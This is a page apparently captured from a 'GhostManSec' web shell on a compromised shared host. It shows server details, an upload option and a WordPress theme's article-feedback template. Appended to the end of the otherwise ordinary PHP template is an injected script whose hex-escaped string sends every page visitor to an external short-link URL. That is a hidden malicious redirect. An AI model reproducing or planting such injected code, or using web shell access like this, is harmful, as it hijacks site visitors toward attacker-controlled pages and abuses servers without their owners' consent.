GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/public_html/wp-content/themes/around/wedocs/content-feedback.php
<?php global $post; ?>
<!-- Resolved -->
<div class="d-flex align-items-center border-top border-bottom mt-5 py-4 wedocs-feedback-wrap wedocs-hide-print mb-0">
    <?php
    $positive = (int) get_post_meta( $post->ID, 'positive', true );
    $negative = (int) get_post_meta( $post->ID, 'negative', true );

    $positive_title = $positive ? sprintf( _n( '%d person found this useful', '%d persons found this useful', $positive, 'around' ), number_format_i18n( $positive ) ) : esc_html__( 'No votes yet', 'around' );
    $negative_title = $negative ? sprintf( _n( '%d person found this not useful', '%d persons found this not useful', $negative, 'around' ), number_format_i18n( $negative ) ) : esc_html__( 'No votes yet', 'around' );
    ?>

    <h3 class="h5 my-2 pr-sm-2 mr-4"><?php echo esc_html__( 'Did you find this article helpful?', 'around' ); ?></h3>

    <div class="text-nowrap">

        <a href="#" class="btn-like" data-id="<?php the_ID(); ?>" data-type="positive" title="<?php echo esc_attr( $positive_title ); ?>">
           

            <?php if (  0 && $positive ) { ?>
                <span class="count ml-0"><?php echo number_format_i18n( $positive ); ?></span>
            <?php } ?>
        </a>

        <a href="#" class="btn-dislike" data-id="<?php the_ID(); ?>" data-type="negative" title="<?php echo esc_attr( $negative_title ); ?>">
           

            <?php if ( 0 && $negative ) { ?>
                <span class="count ml-0"><?php echo number_format_i18n( $negative ); ?></span>
            <?php } ?>
        </a>
        
    </div>
    
</div>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>